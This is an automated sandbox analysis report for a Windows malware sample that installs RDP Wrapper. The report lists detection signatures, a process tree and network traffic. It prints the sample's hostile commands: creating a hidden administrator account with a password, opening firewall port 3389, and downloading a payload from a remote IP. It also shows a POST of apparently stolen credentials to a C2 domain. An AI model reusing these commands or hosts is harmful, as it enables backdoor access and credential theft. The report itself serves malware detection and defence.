Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523922
MD5:6ceb22aeb317c27cf8a0944ec9634d40
SHA1:235d29feea468488b0f1faa70ac2ce1488ea79d7
SHA256:d2184ec878d89c46f860fa4c37b4d3ebe4803287d894ae8eabf3e1d28ce322da
Tags:exeuser-Bitsight
Infos:

Detection

RDPWrap Tool
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a new user with administrator rights
Allows multiple concurrent remote connection
Enables remote desktop connection
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: RDP Sensitive Settings Changed
Uses netsh to modify the Windows network and firewall settings
Yara detected Costura Assembly Loader
Yara detected RDPWrap Tool
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: New User Created Via Net.EXE
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6CEB22AEB317C27CF8A0944EC9634D40)
    • cmd.exe (PID: 7576 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RDPWInst.exe (PID: 7620 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)
        • netsh.exe (PID: 7760 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • cmd.exe (PID: 4092 cmdline: "cmd.exe" /c net user PansyBins WelTW4HnaKt3 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 4904 cmdline: net user PansyBins WelTW4HnaKt3 /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7284 cmdline: C:\Windows\system32\net1 user PansyBins WelTW4HnaKt3 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 5916 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 6344 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 6008 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 1916 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 6836 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • cmd.exe (PID: 5528 cmdline: "cmd.exe" /c net localgroup "Administrators" PansyBins /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 1588 cmdline: net localgroup "Administrators" PansyBins /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 3264 cmdline: C:\Windows\system32\net1 localgroup "Administrators" PansyBins /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
  • rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)
  • tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
      C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          00000001.00000000.1376199757.00000000006D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                00000004.00000000.1400872744.0000000000450000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                  Click to see the 3 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  1.0.file.exe.6d0000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    4.2.RDPWInst.exe.400000.0.unpackJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                      4.2.RDPWInst.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        4.0.RDPWInst.exe.400000.0.unpackJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                          4.0.RDPWInst.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Outbound RDP Connections Over Non-Standard Tools
                            Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\file.exe, Initiated: true, ProcessId: 7404, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49710
                            Sigma detected: RDP Sensitive Settings Changed
                            Source: Registry Key setAuthor: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 7620, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll
                            Sigma detected: Execution of Suspicious File Type Extension
                            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys
                            Sigma detected: New User Created Via Net.EXE
                            Source: Process startedAuthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user PansyBins WelTW4HnaKt3 /add, CommandLine: net user PansyBins WelTW4HnaKt3 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user PansyBins WelTW4HnaKt3 /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4092, ParentProcessName: cmd.exe, ProcessCommandLine: net user PansyBins WelTW4HnaKt3 /add, ProcessId: 4904, ProcessName: net.exe
                            Sigma detected: Net.exe Execution
                            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user PansyBins WelTW4HnaKt3 /add, CommandLine: net user PansyBins WelTW4HnaKt3 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user PansyBins WelTW4HnaKt3 /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4092, ParentProcessName: cmd.exe, ProcessCommandLine: net user PansyBins WelTW4HnaKt3 /add, ProcessId: 4904, ProcessName: net.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T08:55:38.682625+020028033053Unknown Traffic192.168.2.749709104.26.13.20580TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Multi AV Scanner detection for domain / URL
                            Source: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exeVirustotal: Detection: 22%Perma Link
                            Source: https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/Virustotal: Detection: 10%Perma Link
                            Source: http://147.45.44.104Virustotal: Detection: 21%Perma Link
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files\RDP Wrapper\rdpwrap.dllReversingLabs: Detection: 54%
                            Source: C:\Program Files\RDP Wrapper\rdpwrap.dllVirustotal: Detection: 56%Perma Link
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeReversingLabs: Detection: 68%
                            Multi AV Scanner detection for submitted file
                            Source: file.exeReversingLabs: Detection: 21%
                            Source: file.exeVirustotal: Detection: 34%Perma Link
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: file.exeJoe Sandbox ML: detected
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49711 version: TLS 1.2
                            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressedlB source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressed source: file.exe
                            Source: Binary string: RfxVmt.pdb source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.4.dr, RDPWInst.exe.1.dr
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdb source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: <>c__DisplayClass0_0<>9__5_0<GetTotalDiskSpace>b__5_0<GenerateRandomPassword>b__0<>u__1Nullable`1IEnumerable`1Task`1TaskAwaiter`10xb11a1ToInt32<faker>5__2<>u__2Func`2Dictionary`2ToInt64<Main>d__4get_UTF8<>9<Module><Main>U3lzdGVtSW5mb0FBQ2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBGetTotalRAMSystem.IOGetPublicIP_Costuracostura.metadatamscorlib<>cSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.bogus.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordReplaceGetTotalDiskSpaceNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheInvokeIEnumerableIDisposableget_AsyncWaitHandleDownloadFileGetOSNameGetGPUNameget_Nameget_MachineNamefullNameGetAdminGroupNameuserNameGetProcessorNameGetNameLastNameFirstNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValuedriveadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamget_Itemset_ItemSystemSymmetricAlgorithmHashAlgorithmTrimRandomrandomICryptoTransformSumTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionManagementObjectCollectionset_PositionSetExceptionStringComparisonpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__builderGendersenderManagementObjectSearcherFakerResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsSystem.Collectionsget_CharsProcessBogus.DataSetsSystem.Net.SocketsExistsB
                            Source: Binary string: RfxVmt.pdbGCTL source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.4.dr, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: file.exe
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdbSHA256v0& source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_004092D8 FindFirstFileW,FindClose,4_2_004092D8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0040F73C FindFirstFileW,FindClose,4_2_0040F73C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,4_2_00408EB9

                            Networking

                            barindex
                            Yara detected RDPWrap Tool
                            Source: Yara matchFile source: 4.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.1400872744.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RDPWInst.exe PID: 7620, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.7:49710 -> 8.46.123.33:3389
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 06:54:58 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: POST /core/receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 185Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                            Source: Joe Sandbox ViewIP Address: 8.46.123.33 8.46.123.33
                            Source: Joe Sandbox ViewASN Name: AS-PUBMATICUS AS-PUBMATICUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownDNS query: name: api.ipify.org
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49709 -> 104.26.13.205:80
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0043CF60 InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,4_2_0043CF60
                            Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: hansgborn.eu
                            Source: unknownHTTP traffic detected: POST /core/receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 185Expect: 100-continueConnection: Keep-Alive
                            Source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1799416851.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104
                            Source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe4
                            Source: file.exe, 00000001.00000002.1800235734.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
